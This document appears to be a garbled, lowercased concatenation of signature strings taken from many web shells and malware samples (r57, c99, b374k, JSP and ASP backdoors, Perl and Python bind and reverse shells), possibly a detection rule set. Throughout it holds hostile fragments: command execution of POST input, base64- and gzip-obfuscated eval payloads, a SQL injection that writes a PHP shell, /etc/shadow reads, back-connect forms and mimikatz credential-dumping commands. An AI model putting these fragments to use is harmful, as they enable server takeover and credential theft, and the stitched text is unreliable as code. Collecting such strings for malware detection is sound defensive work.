$directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' 
color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. 
- sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? 
echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... 
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 download excuteencryptorfunctionpointer %d%s\\%s.lnkmac:%s-cpu:%s-hd:%sfeed back responce of hostget token at hostdwn md5 err\
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 nullfilenameusage: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]you may enter between 1 and 6 ports to change the defaults.sprqwvusage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modebad mode, should be 'd' or 'e'wshtcpip.wshgetsocketinformation\\\\.\\%hs.?avresultip@mini_mcl_cmd_netconnections@@c
1 encryptpe_init
1 cmd.exe /c %s > %sexecute cmd timeout.rundll32.exe \"%s\",settingdownloadfile - exception:%s.cdllapp::initinstance() - evnet create successful.uploadfile - encryptbuffer errorw
1 email: wfs#encryptpe.com
1 b.qcrypt version 1.0encrypt and decrypt using rsa cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
1 homepage: www.encryptpe.com
1 .epe: encryptpe v2.2006.1.15h'
1 homepage: www.encrypt
2 epe: encryptpe v2.2007.12.1, copyright (c) wfs
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
/bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . 
$directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' 
